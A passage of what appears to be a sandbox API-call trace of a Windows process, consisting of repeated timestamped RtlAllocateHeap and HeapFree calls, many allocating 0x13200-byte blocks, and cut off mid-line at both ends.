(HeapHandle=0x590000, Flags=0x0, Size=0x474d) returned 0x5c66d0 [0167.026] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c3730 | out: hHeap=0x590000) returned 1 [0167.026] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5decb0 | out: hHeap=0x590000) returned 1 [0167.026] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x920) returned 0x5dd940 [0167.026] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd940 | out: hHeap=0x590000) returned 1 [0167.026] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1b47) returned 0x5dd940 [0167.026] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xd90) returned 0x5cae30 [0167.027] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x6d0) returned 0x5df490 [0167.027] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd940 | out: hHeap=0x590000) returned 1 [0167.027] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5cae30 | out: hHeap=0x590000) returned 1 [0167.027] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5df490 | out: hHeap=0x590000) returned 1 [0167.027] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x5d0) returned 0x5a8910 [0167.027] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x6adf) returned 0x5a93e0 [0167.027] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c66d0 | out: hHeap=0x590000) returned 1 [0167.027] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8910 | out: hHeap=0x590000) returned 1 [0167.027] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1887) returned 0x5dd940 [0167.027] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xc30) returned 0x5df1d0 [0167.027] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x620) returned 0x5a8910 [0167.028] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd940 | out: hHeap=0x590000) returned 1 [0167.028] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5df1d0 | out: hHeap=0x590000) returned 1 [0167.028] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8910 | out: hHeap=0x590000) returned 1 [0167.028] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8f0) returned 0x5dd940 [0167.028] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x480) returned 0x5a8910 [0167.028] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x240) returned 0x5de240 [0167.028] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd940 | out: hHeap=0x590000) returned 1 [0167.029] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8910 | out: hHeap=0x590000) returned 1 [0167.029] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5de240 | out: hHeap=0x590000) returned 1 [0167.029] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x40) returned 0x59ff50 [0167.029] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x59b950 | out: hHeap=0x590000) returned 1 [0167.029] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5bdb40 | out: hHeap=0x590000) returned 1 [0167.035] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a93e0 | out: hHeap=0x590000) returned 1 [0167.036] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x59ff50 | out: hHeap=0x590000) returned 1 [0167.036] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x9900) returned 0x5a93e0 [0167.037] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1bf0) returned 0x5dd940 [0167.038] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd940 | out: hHeap=0x590000) returned 1 [0167.038] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x9937) returned 0x5bdb40 [0167.040] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a93e0 | out: hHeap=0x590000) returned 1 [0167.040] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20) returned 0x59b6e0 [0167.040] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x9900) returned 0x5a93e0 [0167.040] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1bf0) returned 0x5dd940 [0167.041] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd940 | out: hHeap=0x590000) returned 1 [0167.041] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x9937) returned 0x5dd940 [0167.042] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a93e0 | out: hHeap=0x590000) returned 1 [0167.043] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x40) returned 0x5a0090 [0167.043] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x59b6e0 | out: hHeap=0x590000) returned 1 [0167.043] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b3790 | out: hHeap=0x590000) returned 1 [0167.043] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5cda40 | out: hHeap=0x590000) returned 1 [0167.044] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a0e00 | out: hHeap=0x590000) returned 1 [0167.044] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x5a93e0 [0167.044] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x5c7480 [0167.044] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8) returned 0x598d40 [0167.044] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x5e7280 [0167.045] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a9280 [0167.045] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x590000) returned 1 [0167.045] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x5fa490 [0167.046] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x5a91a0 [0167.046] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a9280 | out: hHeap=0x590000) returned 1 [0167.046] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x60d6a0 [0167.046] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20) returned 0x59b6e0 [0167.046] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a91a0 | out: hHeap=0x590000) returned 1 [0167.046] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x6208b0 [0167.047] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x30) returned 0x5a8310 [0167.047] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x59b6e0 | out: hHeap=0x590000) returned 1 [0167.047] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x633ac0 [0167.048] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x646cd0 [0167.048] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x48) returned 0x5a09f0 [0167.048] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8310 | out: hHeap=0x590000) returned 1 [0167.048] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x659ee0 [0167.049] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x66d0f0 [0167.049] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1eb0080 [0167.050] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x68) returned 0x598d40 [0167.050] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a09f0 | out: hHeap=0x590000) returned 1 [0167.050] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1ec3290 [0167.050] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1ed64a0 [0167.051] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1ee96b0 [0167.051] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1efc8c0 [0167.052] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x98) returned 0x5950b0 [0167.052] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x590000) returned 1 [0167.052] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1f0fad0 [0167.197] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1f22ce0 [0167.198] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1f35ef0 [0167.198] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1f49100 [0167.199] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1f5c310 [0167.199] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1f6f520 [0167.200] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xe0) returned 0x594880 [0167.200] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5950b0 | out: hHeap=0x590000) returned 1 [0167.200] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1f82730 [0167.200] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1fb0080 [0167.201] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1fc3290 [0167.202] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1fd64a0 [0167.202] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1fe96b0 [0167.203] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1ffc8c0 [0167.203] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x200fad0 [0167.204] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2022ce0 [0167.204] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2035ef0 [0167.205] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x150) returned 0x59b0b0 [0167.205] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x594880 | out: hHeap=0x590000) returned 1 [0167.205] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2049100 [0167.206] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x205c310 [0167.206] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x206f520 [0167.207] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2082730 [0167.207] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2095940 [0167.208] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x20a8b50 [0167.208] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x20bbd60 [0167.209] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x20cef70 [0167.209] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x20e2180 [0167.210] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x20f5390 [0167.210] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x21085a0 [0167.211] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x211b7b0 [0167.211] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x212e9c0 [0167.212] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2141bd0 [0167.212] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1f8) returned 0x5a8910 [0167.212] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x59b0b0 | out: hHeap=0x590000) returned 1 [0167.212] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2154de0 [0167.212] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2167ff0 [0167.213] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x217b200 [0167.213] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x218e410 [0167.214] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x21b0080 [0167.215] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x21c3290 [0167.215] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x21d64a0 [0167.216] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x21e96b0 [0167.216] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x21fc8c0 [0167.217] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x220fad0 [0167.217] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2222ce0 [0167.218] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2235ef0 [0167.220] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2249100 [0167.220] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x225c310 [0167.221] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x226f520 [0167.233] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2282730 [0167.234] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2295940 [0167.234] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x22a8b50 [0167.235] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x22bbd60 [0167.235] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x22cef70 [0167.236] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x22e2180 [0167.237] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2f0) returned 0x5a8b10 [0167.237] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8910 | out: hHeap=0x590000) returned 1 [0167.237] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x22f5390 [0167.237] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x23085a0 [0167.238] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x231b7b0 [0167.239] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x232e9c0 [0167.240] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2341bd0 [0167.240] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2354de0 [0167.240] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2367ff0 [0167.241] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x237b200 [0167.241] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x238e410 [0167.242] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x23a1620 [0167.242] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x23b4830 [0167.243] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x23c7a40 [0167.243] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x23dac50 [0167.244] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x23ede60 [0167.412] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2401070 [0167.412] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2414280 [0167.445] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2427490 [0167.445] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x243a6a0 [0167.446] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x244d8b0 [0167.446] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2460ac0 [0167.446] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2473cd0 [0167.447] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2486ee0 [0167.447] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x249a0f0 [0167.448] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x24ad300 [0167.448] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x24c0510 [0167.448] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x24d3720 [0167.449] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x24e6930 [0167.449] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x24f9b40 [0167.449] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x250cd50 [0167.449] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x251ff60 [0167.450] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2533170 [0167.450] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x468) returned 0x5bc5f0 [0167.450] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8b10 | out: hHeap=0x590000) returned 1 [0167.450] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2546380 [0167.450] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2559590 [0167.451] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x256c7a0 [0167.451] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x257f9b0 [0167.452] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2592bc0 [0167.452] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x25b0080 [0167.453] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x25c3290 [0167.454] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x25d64a0 [0167.454] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x25e96b0 [0167.455] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x25fc8c0 [0167.456] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x260fad0 [0167.456] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2622ce0 [0167.457] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2635ef0 [0167.457] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2649100 [0167.458] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x265c310 [0167.458] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x266f520 [0167.459] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2682730 [0167.460] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2695940 [0167.460] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x26a8b50 [0167.461] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x26bbd60 [0167.461] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x26cef70 [0167.462] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x26e2180 [0167.462] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x26f5390 [0167.463] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x27085a0 [0167.463] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x271b7b0 [0167.464] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x272e9c0 [0167.464] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2741bd0 [0167.464] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2754de0 [0167.465] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2767ff0 [0167.465] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x277b200 [0167.466] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x278e410 [0167.466] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x27a1620 [0167.466] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x27b4830 [0167.467] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x27c7a40 [0167.467] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x27dac50 [0167.468] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x27ede60 [0167.468] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2801070 [0167.469] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2814280 [0167.469] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2827490 [0167.470] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x283a6a0 [0167.470] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x284d8b0 [0167.471] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2860ac0 [0167.471] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2873cd0 [0167.472] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2886ee0 [0167.472] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x289a0f0 [0167.473] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x28ad300 [0167.473] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x28c0510 [0167.474] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x698) returned 0x5a8910 [0167.474] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5bc5f0 | out: hHeap=0x590000) returned 1 [0167.474] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x28d3720 [0167.475] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x28e6930 [0167.475] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x28f9b40 [0167.477] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x290cd50 [0167.478] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x291ff60 [0167.478] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2933170 [0167.479] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2946380 [0167.479] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2959590 [0167.480] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x296c7a0 [0167.480] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x297f9b0 [0167.579] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2992bc0 [0167.580] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x29a5dd0 [0167.581] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x29b8fe0 [0167.581] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x29cc1f0 [0167.582] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x29df400 [0167.582] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x29f2610 [0167.583] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2a05820 [0167.583] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2a18a30 [0167.584] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2a2bc40 [0167.584] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2a3ee50 [0167.585] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2a52060 [0167.585] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2a65270 [0167.586] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2a78480 [0167.586] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2a8b690 [0167.587] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2a9e8a0 [0167.587] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2ab1ab0 [0167.587] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2ac4cc0 [0167.588] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2ad7ed0 [0167.588] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2aeb0e0 [0167.589] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2afe2f0 [0167.590] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2b11500 [0167.590] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2b24710 [0167.591] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2b37920 [0167.591] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2b4ab30 [0167.592] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2b5dd40 [0167.592] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2b70f50 [0167.593] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2b84160 [0167.593] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2b97370 [0167.594] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2baa580 [0167.594] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2bbd790 [0167.595] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2bd09a0 [0167.595] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2be3bb0 [0167.596] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2bf6dc0 [0167.596] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2c09fd0 [0167.597] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2c1d1e0 [0167.597] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2c303f0 [0167.598] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, 